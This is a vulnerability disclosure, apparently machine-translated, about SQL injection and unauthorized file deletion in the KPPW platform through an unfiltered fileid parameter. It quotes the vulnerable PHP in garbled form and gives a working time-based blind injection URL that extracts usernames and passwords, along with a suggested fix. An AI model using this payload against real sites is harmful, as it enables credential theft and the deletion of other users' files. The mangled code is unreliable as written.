KPPW latest SQL injection vulnerability 8 (global problems cause 12 injection and unauthorized operations)

KPPW latest SQL injection vulnerability 8 (global problems cause 12 injection and unauthorized operations)

KPPW Latest Version SQL injection vulnerability 8. Identify the culprit from one problem. Global File problems cause 12 injection and unauthorized operations.

File/control/pubgoods. php

<? Phpkekezu: check_login (); $ strPageTitle = 'Publish item -'. $ _ K ['html _ title']; $ strPageKeyword = 'Publish a commodity ,'. $ _ K ['html _ title']; $ strPageDescription = $ kekezu-> _ sys_config ['index _ seo_desc ']; $ id = intval ($ id ); $ step = strval (trim ($ step ));...... $ strUrl = "index. php? Do = pubgoods & id = ". $ id; $ _ SESSION ['spread'] = 'index. php? Do = pubgoods '; require S_ROOT. "/shop/". $ arrModelInfo ['model _ dir']. "/control/pub. php ";

For the last two rows, $ arrModelInfo ['model _ dir'] can be goods or service.

When $ arrModelInfo ['model _ dir'] is goods, follow up the file:

/Shop/goods/control/pub. php

<? Php defined ('in _ kekeke') or exit ('Access Denied '); $ stdCacheName = 'service _ cache _'. $ id. '_'. substr (md5 ($ gUid), 0, 6); $ objRelease = goods_release_class: get_instance ($ id); $ objRelease-> get_service_obj ($ stdCacheName ); $ arrPubInfo = $ objRelease-> _ std_obj-> _ release_info; $ arrConfig = $ objRelease-> _ service_config; $ arrPubInfo ['indus _ Pi'] and $ arrAllIndustrys = CommonClass :: getIndustryByPid ($ arrPubInfo ['indus _ pid '], 'indus _ id, indus_pid, indus_name'); switch ($ step) {case 'step1 ':...... if ($ action = 'delete _ image') {$ strSql = sprintf ("select file_id, file_name, save_name from % switkey_file where file_id in (% s)", TABLEPRE, $ fileid); $ arrFileInfo = db_factory: get_one ($ strSql); $ resText = CommonClass: delFileByFileId ($ fileid); if ($ resText) {$ array = explode (',', $ arrPubInfo ['file _ id']); $ newArr = CommonClass: returnNewArr ($ arrFileInfo ['Save _ name'], $ array); $ _ POST ['file _ id'] = implode (",", $ newArr); $ arrPubInfo and $ _ POST = array_merge ($ arrPubInfo, $ _ POST); $ objRelease-> save_service_obj ($ _ POST, $ stdCacheName); kekezu: echojson ('deleted successfully', 1, array ('fileid' => $ fileid, 'Save _ name' => $ arrFileInfo ['Save _ name']); die ;}} if ($ action = 'delete _ goodsfile ') {$ strSql = sprintf ("select file_id, file_name, save_name from % switkey_file where file_id in (% s)", TABLEPRE, $ fileid); $ arrFileInfo = db_factory: get_one ($ strSql); $ resText = CommonClass: delFileByFileId ($ fileid );

When action = delete_image or action = delete_goodsfile, The fileid parameter enters the SQL statement without filtering and without quotation marks. This causes SQL injection.



Continue, the parameter fileid also enters the delFileByFileId function, continue tracking:

File/lib/inc/CommonClass. php:

public static function delFileByFileId($fileId){$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileId);$arrFileInfo = db_factory::get_one($strSql);$filename = S_ROOT.$arrFileInfo['save_name'];if(file_exists($filename)){unlink($filename);}return db_factory::execute("delete from ".TABLEPRE."witkey_file where file_id = ".$fileId);}

The fileid here also enters the select and delete statements without filtering and protection, resulting in two Injection



Here, when you delete a file, you can delete the image of a product or task published by the user, and delete the file based on the fileid at the end of the delete operation. The user attribute of the deleted object is not determined, as a result, files released by any user can be deleted at will, resulting in unauthorized operations.



Next let's take a look at the file/lib/inc/CommonClass. php, which is a globally called function.

Let's see how many files use the delFileByFileId function in/lib/inc/CommonClass. php.
 

We can see that 12 files use the delFileByFileId function. Let's look for two other files to see if the fileid parameter passed in the delFileByFileId function is not processed.

The first file/control/taskhandle. php:

Case 'workover ': if (isset ($ formhash) & kekezu: submitcheck ($ formhash) {$ resText = $ objTask-> work_over ($ tarContent, $ file_id, intval ($ modify); if ($ resText = true) {kekezu: show_msg ('Operation successful ', 'index. php? Do = task & id = '. $ taskId, 3, NULL,' OK ');} else {kekezu: show_msg ($ resText, 'index. php? Do = task & id = '. $ taskId, 3, NULL, 'fail ') ;}} if ($ action = 'deletefile') {$ resText = CommonClass: delFileByFileId ($ fileid ); if ($ resText) {kekezu: echojson ('deleted successfully', 1, array ('fileid' => $ fileid); die ;}}

The fileid is not processed in the full text. after entering the delFileByFileId function, it will also cause injection.

Other issues are not listed one by one.

If the fileid is not processed, it directly enters the delFileByFileId function and then the fileid enters the select and delete statements, resulting in SQL injection and the vulnerability of unauthorized deletion of arbitrary User Files

SQL Injection Vulnerability:

http://localhost/KPPW2520141118UTF-8/index.php?do=pubgoods&step=step1&action=delete_image&fileid=5566)+and+1=if(mid((select+concat(username,password)+from+keke_witkey_member+limit+0,1),1,1)=char(97),sleep(5),2)%23

The returned result will be delayed by 10 seconds.

Because two select statements exist here, sleep (5) is performed twice.
 

Check the database execution results:
 

The SQL statement is successfully executed.



Here, the first character of UserName + password is a. If you continue to execute the command, you can inject the complete UserName and password. Before the script is injected, you can modify the request.

Solution:

Add intval or single quotation marks before fileid enters the SQL statement.